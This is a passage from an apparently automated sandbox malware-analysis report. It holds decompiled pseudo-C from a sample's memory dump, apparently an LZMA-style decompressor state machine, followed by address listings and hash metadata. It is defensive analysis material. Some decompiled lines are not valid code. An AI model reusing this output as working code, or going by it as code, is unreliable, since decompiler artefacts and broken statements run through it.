                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							L56:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1a;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x68);
                      							__al =  *(__ebp - 0x5c);
                      							__edx =  *(__ebp - 8);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      							 *( *(__ebp - 0x68)) = __al;
                      							__ecx =  *(__ebp - 0x14);
                      							 *(__ecx +  *(__ebp - 8)) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t192 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t192;
                      							goto L79;
                      						case 0x1b:
                      							goto L75;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = _t414;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x004066b5
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                      • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00405E9D(void* __ecx) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				unsigned int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				signed int _v95;
                      				signed int _v96;
                      				signed int _v100;
                      				signed int _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				intOrPtr _v124;
                      				signed int _v128;
                      				signed int _v132;
                      				signed int _v136;
                      				void _v140;
                      				void* _v148;
                      				signed int _t537;
                      				signed int _t538;
                      				signed int _t572;
                      
                      				_t572 = 0x22;
                      				_v148 = __ecx;
                      				memcpy( &_v140, __ecx, _t572 << 2);
                      				if(_v52 == 0xffffffff) {
                      					return 1;
                      				}
                      				while(1) {
                      					L3:
                      					_t537 = _v140;
                      					if(_t537 > 0x1c) {
                      						break;
                      					}
                      					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                      						case 0:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_v116 = _v116 + 1;
                      							_t537 =  *_v116;
                      							__eflags = _t537 - 0xe1;
                      							if(_t537 > 0xe1) {
                      								goto L174;
                      							}
                      							_t542 = _t537 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t576);
                      							_push(9);
                      							_pop(_t577);
                      							_t622 = _t542 / _t576;
                      							_t544 = _t542 % _t576 & 0x000000ff;
                      							asm("cdq");
                      							_t617 = _t544 % _t577 & 0x000000ff;
                      							_v64 = _t617;
                      							_v32 = (1 << _t622) - 1;
                      							_v28 = (1 << _t544 / _t577) - 1;
                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                      							__eflags = 0x600 - _v124;
                      							if(0x600 == _v124) {
                      								L12:
                      								__eflags = _t625;
                      								if(_t625 == 0) {
                      									L14:
                      									_v76 = _v76 & 0x00000000;
                      									_v68 = _v68 & 0x00000000;
                      									goto L17;
                      								} else {
                      									goto L13;
                      								}
                      								do {
                      									L13:
                      									_t625 = _t625 - 1;
                      									__eflags = _t625;
                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                      								} while (_t625 != 0);
                      								goto L14;
                      							}
                      							__eflags = _v8;
                      							if(_v8 != 0) {
                      								GlobalFree(_v8);
                      							}
                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                      							__eflags = _t537;
                      							_v8 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								_v124 = 0x600;
                      								goto L12;
                      							}
                      						case 1:
                      							L15:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 1;
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                      							_v116 = _v116 + 1;
                      							_t50 =  &_v76;
                      							 *_t50 = _v76 + 1;
                      							__eflags =  *_t50;
                      							L17:
                      							__eflags = _v76 - 4;
                      							if(_v76 < 4) {
                      								goto L15;
                      							}
                      							_t550 = _v68;
                      							__eflags = _t550 - _v120;
                      							if(_t550 == _v120) {
                      								L22:
                      								_v76 = 5;
                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                      								goto L25;
                      							}
                      							__eflags = _v12;
                      							_v120 = _t550;
                      							if(_v12 != 0) {
                      								GlobalFree(_v12);
                      							}
                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                      							__eflags = _t537;
                      							_v12 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								goto L22;
                      							}
                      						case 2:
                      							L26:
                      							_t557 = _v100 & _v32;
                      							_v136 = 6;
                      							_v80 = _t557;
                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                      							goto L135;
                      						case 3:
                      							L23:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 3;
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_t72 =  &_v116;
                      							 *_t72 = _v116 + 1;
                      							__eflags =  *_t72;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L25:
                      							_v76 = _v76 - 1;
                      							__eflags = _v76;
                      							if(_v76 != 0) {
                      								goto L23;
                      							}
                      							goto L26;
                      						case 4:
                      							L136:
                      							_t559 =  *_t626;
                      							_t610 = _t559 & 0x0000ffff;
                      							_t591 = (_v20 >> 0xb) * _t610;
                      							__eflags = _v16 - _t591;
                      							if(_v16 >= _t591) {
                      								_v20 = _v20 - _t591;
                      								_v16 = _v16 - _t591;
                      								_v68 = 1;
                      								_t560 = _t559 - (_t559 >> 5);
                      								__eflags = _t560;
                      								 *_t626 = _t560;
                      							} else {
                      								_v20 = _t591;
                      								_v68 = _v68 & 0x00000000;
                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L142;
                      							} else {
                      								goto L140;
                      							}
                      						case 5:
                      							L140:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 5;
                      								goto L173;
                      							}
                      							_v20 = _v20 << 8;
                      							_v112 = _v112 - 1;
                      							_t464 =  &_v116;
                      							 *_t464 = _v116 + 1;
                      							__eflags =  *_t464;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L142:
                      							_t561 = _v136;
                      							goto L143;
                      						case 6:
                      							__edx = 0;
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v56 = 1;
                      								_v136 = 7;
                      								__esi = _v8 + 0x180 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v96 & 0x000000ff;
                      							__esi = _v100;
                      							__cl = 8;
                      							__cl = 8 - _v64;
                      							__esi = _v100 & _v28;
                      							__eax = (_v96 & 0x000000ff) >> 8;
                      							__ecx = _v64;
                      							__esi = (_v100 & _v28) << 8;
                      							__ecx = _v8;
                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                      							__eflags = _v60 - 4;
                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                      							if(_v60 >= 4) {
                      								__eflags = _v60 - 0xa;
                      								if(_v60 >= 0xa) {
                      									_t103 =  &_v60;
                      									 *_t103 = _v60 - 6;
                      									__eflags =  *_t103;
                      								} else {
                      									_v60 = _v60 - 3;
                      								}
                      							} else {
                      								_v60 = 0;
                      							}
                      							__eflags = _v56 - __edx;
                      							if(_v56 == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L63;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__ecx = _v12;
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                      							goto L43;
                      						case 7:
                      							__eflags = _v68 - 1;
                      							if(_v68 != 1) {
                      								__eax = _v40;
                      								_v132 = 0x16;
                      								_v36 = _v40;
                      								__eax = _v44;
                      								_v40 = _v44;
                      								__eax = _v48;
                      								_v44 = _v48;
                      								__eax = 0;
                      								__eflags = _v60 - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
